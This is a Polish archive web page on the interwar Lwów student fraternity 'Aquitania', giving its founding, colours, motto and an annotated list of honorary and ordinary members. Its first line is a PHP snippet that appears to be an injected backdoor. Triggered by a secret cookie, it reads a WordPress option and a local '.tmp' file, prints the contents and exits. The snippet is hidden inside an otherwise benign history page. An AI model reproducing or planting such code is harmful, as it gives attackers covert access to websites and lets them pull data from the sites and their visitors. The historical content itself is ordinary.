if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Aquitania

Dekiel Aquitania - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Aquitania” we Lwowie
Siedziba:
Lwów
Data powstania:
3 XII 1924 r.
Barwy:
ciemnobrązowa – ciemnozielona – złota
Dewiza:
„Per aspera ad astra” („Przez ciernie do gwiazd”)

Rys historyczny

Aquitania, lata 30-te.

Aquitania powstała dnia 3 XII 1924 r. Założycielami byli studenci lwowskich uczelni wyższych, absolwenci VIII Gimnazjum we Lwowie.

Herb Aquitanii, 1933 r.

Od dnia 11 maja 1925 r. korporacja należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 11 V 1925 r.). Kandydowała pod opieką K! Lutyko-Venedya. Prawa członka rzeczywistego uzyskała dnia 1 lutego 1927 r.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 60 nazwisk, w tym pięciu członków honorowych.

Brak wiadomości o powojennej działalności Korporacji i spotkaniach jej członków.

Fidułka (?) Aquitanii, Lwów lata 30-te (?).

Lista członków

Poniższa, niekompletna lista członków Aquitanii obejmuje ponad 65 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Stefan Banach, (30 marca 1892 w Krakowie - 31 sierpnia 1945 we Lwowie) s. Stefana Greczka i Katarzyny Banach, uczeń i absolwent I Gimnazjum im. Bartłomieja Nowodworskiego w Krakowie 1902-10, półdyplom Wydział Inżynierii Lądowej PL, asystent w Katedrze Matematyki na Wydziale Mechanicznym PL, doktorat UJK 1920, habilitacja UJK 1922, od 1922 prof. nadzw. UJK, od 1927 prof. zw. UJK, od 1924 członek korespondent PAU, prezes Polskiego Towarzystwa Matematycznego 1939, Filister honorowy Aragonii i Aquitanii, po zajęciu Lwowa przez Rosjan prof. ULw. i dziekan Wydziału Matematyczno-Fizycznego, członek korespondent Akademii Nauk Ukraińskiej SRR, delegat do sowieckiej Rady Miejskiej Lwowa, w czasie okupacji niemieckiej m.in. wykładowca matematyki na Państwowych Technicznych Kursach Zawodowych 1942-44, po ponownym zajęciu Lwowa przez Rosjan prof. ULw., pochowany na Cmentarzu Łyczakowskim, w 1946 Polskie Towarzystwo Matematyczne ufundowało nagrodę naukową im. S. Banacha, w 1972 utworzono Międzynarodowe Centrum Matematyczne im. S. Banacha przy Instytucie Matematycznym PAN, autor ponad 60 prac naukowych i twórca wielu twierdzeń o fundamentalnym znaczeniu dla wielu działów matematyki, współtwórca z Hugo Steinhausem lwowskiej szkoły matematycznej
 2. Tadeusz Kuchar, (13 kwietnia 1891 w Krakowie - 5 kwietnia 1966 w Warszawie) brat Władysława (Aquitania), lekkoatleta, pływak, łyżwiarz, narciarz, piłkarz Pogoni Lwów, absolwent PL, specjalista budownictwa sportowego, uczestnik walk o niepodległość 1918-20, płk WP, działacz sportowy, współtwórca Polskiego Komitetu Igrzysk Olimpijskich, selekcjoner reprezentacji piłkarskiej 1923, 1925, 1928, pierwszy prezes Polskiego Związku Lekkiej Atletyki, Filister honorowy Aquitanii (?), dyrektor Państwowego Urzędu Wychowania Fizycznego i Przysposobienia Wojskowego (PUWFiPW) a następnie Głównego Komitetu Kultury Fizycznej (GKKF) 1936-39 oraz 1945-50, od 1960 do śmierci dyrektor departamentu budownictwa sportowego w GKKF, prezes PZPN 1945-46, twórca Torwaru, hali sportowej w Gliwicach, współtwórca Stadionu X-lecia w Warszawie, autor prac poświęconych budownictwu sportowemu, odznaczony Krzyżem Virtuti Militari za 1918-1920, Krzyżem Kawalerskim (II RP) i Komandorskim (PRL) OOP
 3. Władysław Kuchar, brat Tadeusza (Aquitania), piłkarz Pogoni Lwów, tenisista i wieloboista, inż., Filister honorowy Aquitanii (?)
 4. Kazimierz Powidzki, dyrektor, Filister honorowy Aquitanii (?)
 5. Zygmunt Smogorzewski, (12 października 1884 w Poniewieżu - 11 listopada 1931 we Lwowie) s. Bronisława, arabista, islamista, dyplomata carski, prof. UJK, Filister honorowy Aquitanii

Członkowie rzeczywiści

 1. Jan Wilhelm Burda, ( - 1940?) student i absolwent polonistyki UJK, akt. 1930-39, sekretarz sem. zim. oraz sem. let. 1932/33, olderman sem. let. 1935/36, wiceprezes Bratniej Pomocy UJK 1935, oficer rez., żołnierz wojny obronnej 1939, wrócił do Lwowa, działał w ZWZ, aresztowany przez NKWD w nocy 30 sierpnia 1940, zaginął bez wieści
 2. Antoni Cisowski, student med. UJK, założyciel Aquitanii
 3. Marian Dienar (?), student prawa UJK, założyciel Aquitanii
 4. Leon Drehr (?), student PL, założyciel Aquitanii
 5. Adam Durski, student prawa UJK, założyciel Aquitanii
 6. Zbigniew Duszyk, ( - 1979), akt. 1928-32, prezes 1931/32
 7. Leopold Dutkiewicz, student i absolwent polonistyki UJK, akt. 1928-33, prezes sem. zim. 1932/33, wiceprezes Lwowskiego Koła Międzykorporacyjnego 1932/33 (1933/34?)

  Bronisław Ekert, 1934 r. (?).

 8. Bronisław Ekert, (18 lipca 1913 - 23 sierpnia 2005) student i absolwent Wydziału Filozoficznego UJK, c. 1931, akt. 1931-38, pchor. rez. artylerii, w czasie okupacji oficer AK, ciężko ranny w Powstaniu Warszawskim, od 1944 szef propagandy Zarządu Głównego Stronnictwa Narodowego, więziony 1946-55, od 1980 we władzach Stronnictwa Narodowego w Polsce (senioralne)

  Stefan (?) Feczko, 1934 r. (?).

 9. Stefan Wojciech Feczko, (23 kwietnia 1911 w Chyrowie - 19 stycznia 1973 w Bytomiu) s. Mariana i Stefanii z d. Skiba, absolwent XII Gimnazjum Matematyczno-Przyrodniczego we Lwowie, student inżynierii lądowej PL, c. ok. 1931, akt. 1931-38, II wiceprezes sem. let. 1935/36, prezes Lwowskiego Koła Międzykorporacyjnego 1937/38, trenował szermierkę w AZS we Lwowie, sześciokrotny akademicki mistrz Polski, w czasie okupacji pracował na lotnisku w Krośnie, po wojnie uzyskał dyplom Akademii Górniczej 1946, pracował w Spółdzielni Inżynieryjnej we Wrocławiu oraz wrocławiskim Przedsiębiorstwie Budowy Pieców Przemysłowych, a następnie w Przedsiębiorstwie Budowy Pieców Przemysłowych w Bytomiu oraz Technikum Budowlanym w Bytomiu, pochowany na cmentarzu przy ul. Strzelców Bytomskich w Bytomiu

 10. Marian Geisler, (31 grudnia 1906 we Lwowie [wg dokumentów 2 stycznia 1907] - 17 lipca 1983 w Katowicach) student PL, delegat na 100-lecie Konwentu Polonia 1928
 11. Zbigniew Howiyka, (1910 - 5 lipca 1977 w Katowicach) student i absolwent geologii UJK, c. 1931, akt. 1931-39, pchor. rez. artylerii, żołnierz w wojnie obronnej 1939
 12. Zbigniew Huberd, student Wyższej Szkoły Handlu Zagranicznego, założyciel Aquitanii
 13. Bolesław Jałowy, ( - 1 października 1943 we Lwowie) student i absolwent med. UJK, akt. 1925-31, wiceprezes, prezes, olderman, dr med., prof. UJK, zastrzelony na ulicy przez ukraińskiego policjanta
 14. Jan Jaskólski, (ok. 1910 - ) akt. 1930-39, wiceprezes, prezes i olderman, po wojnie na emigracji w Brazylii
 15. Franciszek Kapuściak, akt. 1930
 16. Michał Kolendowski , student prawa UJK, założyciel Aquitanii

  Franciszek Kubec, 1934 r. (?).

 17. Franciszek Kubec, ( - zm. w Wiedniu) student i absolwent inżynierii lądowej PL, akt. 1929-35, olderman sem. zim. 1932/33

  Jan Kwaśnicki, 1937 r.

 18. Jan Kwaśnicki, akt. 1934-38, sekretarz sem. let. 1935/36

 19. Tadeusz Lech, student filozofii UJK, założyciel Aquitanii
 20. Kazimierz Legeżyński, ( - sierpień 1974) II wiceprezes sem. zim. 1932/33, prezes sem. let. 1932/33, po wojnie na emigracji w Australii
 21. Stanisław Lewicki, (1908? - 1941 we Lwowie) brat Tadeusza (Aquitania), zamordowany w więzieniu przez Sowietów po ataku Niemców na ZSRR
 22. Tadeusz Lewicki , (1906 - 22 listopada 1992 w Krakowie) brat Stanisława (Aquitania), student i absolwent 1938 arabistyki UJK, w czasie wojny ppor. AK, m.in.. w oddziałach partyzanckich na Zamojszczyźnie, redaktor partyzanckiej gazetki “Echa Leśne”, uczestnik Powstania Warszawskiego 1944, po upadku Powstania w niemieckim oflagu w Murnau, po wyzwoleniu w II Korpusie PSZ we Włoszech, w 1947 wrócił do UJ, prof. i kierownik Katedry Filologii Orientalnej (później Instytutu Filologii Orientalnej) UJ, członek PAN, PAU oraz francuskiej Academie des Sciences d’Outre-Mer, doktor honoris causa UWr.
 23. Władysław Tadeusz Liebhart, (21 października 1907 w Kołomyi - 1990) brat Stanisława (Gasconia) student i absolwent 1934 med. UJK, akt. 1927-32, chirurg, lekarz w Szpitalu Powszechnym we Lwowie, po wojnie w Kluczborku
 24. Szymon Łabecki (?), student prawa UJK, założyciel Aquitanii
 25. Madejski, student PL, założyciel Aquitanii
 26. Aleksander Marrucato, student prawa UJK, założyciel Aquitanii
 27. Rudolf Matz, student i absolwent PL, założyciel Aquitanii, konstruktor lotniczy
 28. Edward Monseu, student PL, założyciel Aquitanii
 29. Edward Morozowski, wiceprezes 1930/31
 30. Kazimierz Nabielec, student PL, założyciel Aquitanii
 31. Romuald Nowicki, ( - 1927) student prawa UJK, założyciel Aquitanii, wiceprezes 1927
 32. Jan Oswald, student prawa UJK, założyciel Aquitanii

  Łucjan Paneczko, lata 30-te.

 33. Łucjan Paneczko, (21 marca 1912 w Grodźcu w pow. będzińskim - 29 lutego 1992 w Tarnowskich Górach) inż. górniczy

 34. Kazimierz Perier, (1901-1980) brat Witolda (Aquitania), student PL, założyciel Aquitanii
 35. Witold Perier, (1902-1978) brat Kazimierza (Aquitania), student prawa UJK, założyciel i autor hymnu Aquitanii, akt. 1926-30
 36. Tadeusz Pierożyński, student PL
 37. Tadeusz Podłowski, student med. UJK, założyciel Aquitanii
 38. Leon Popiel, student Wyższej Szkoły Handlu Zagranicznego, założyciel Aquitanii
 39. Władysław Pusz, akt. 1930-38, prezes sem. let. 1935/36, sekretarz Lwowskiego Koła Międzykorporacyjnego 1935/36
 40. Andrzej Roszkowski, (1905 - 14 grudnia 1984 w Krakowie) wiceprezes Lwowskiego Koła Międzykorporacyjnego 1928/29, leśnik, po wojnie doc. AR w Krakowie
 41. Jerzy Rübenbauer, (?)
 42. Bolesław Sadliński, (1912 w Zubowie k. Trembowli - 1997 w Katowicach) brat Stanisława i Kazimierza (obaj Aquitania), student i absolwent med. UJK, akt. 1930-37, wiceprezes 1934 i prezes 1935 Wzajemnej Pomocy Medyków, po wojnie prof. medycyny AM w Zabrzu

  Kazimierz Sadliński, lata 30-te.

 43. Kazimierz Sadliński, (25 sierpnia 1913 w Zubowie pow. Trembowla - 22 marca 1985 w Chicago) s. Zygmunta i Anny z Szwandrowskich, brat Stanisława i Bolesława (obaj Aquitania), student i absolwent 1937/38 prawa UJK, po studiach pracownik kontrwywiadu, w 1940 deportowany na Syberię, od 1942 w 2 Korpusie PSZ, po wojnie na emigracji w Szkocji, skąd w 1951 wyjechał do Stanów Zjednoczonych, pracował jako piekarz, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

 44. Stanisław Sadliński, (10 października 1906 w Zubowie - 30 maja 1984 w Gliwicach), brat Bolesława i Kazimierza (Aquitania) student i absolwent prawa UJK, w 1939 sędzia w Równem na Wołyniu, po wojnie na Śląsku prokurator, a od 1956 adwokat
 45. Klemens Serafini, student med. UJK, założyciel Aquitanii
 46. Sobolewski, student polonistyki UJK, akt. 1930-36
 47. Roman Sokołowski, student med. UJK, prezes sem. zim. 1930/31
 48. Franciszek Stangret, po wojnie na emigracji w Kanadzie, zamiejscowy członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu
 49. Bronisław Szczepankiewicz, ( - 1944 we Lwowie) I wiceprezes sem. let. 1935/36, zastrzelony od tyłu przez ukraińskiego policjanta na ulicy we Lwowie
 50. Adam Szydłowski, akt. 1930
 51. Zbigniew Świderski, akt. 1929-34
 52. Zdzisław Tarczyński, sekretarz sem. zim. 1930/31
 53. Edward Wierzbicki, akt. 1930
 54. Edward Wiłowski (?), student PL
 55. Zygmunt Wiśniowiecki, ( - 1958 w Bytomiu) akt. 1933-38, mgr historii
 56. Wiktor Wołoszyński, student prawa UJK, założyciel Aquitanii
 57. Michał Wołondowski (?), student prawa UJK, założyciel Aquitanii
 58. Józef Wurtka (?), student med. weterynaryjnej AMW, założyciel Aquitanii
 59. Zygmunt Ziemba, student prawa UJK, akt. 1929-35, I wiceprezes sem. zim. 1932/33

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Aquitania (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 72 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Aquitanii.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 15 IX 2010 r.
Ostatnia zmiana: 3 XII 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Aquitania” we Lwowie, (na:) www.archiwumkorporacyjne.pl, stan 3 XII 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }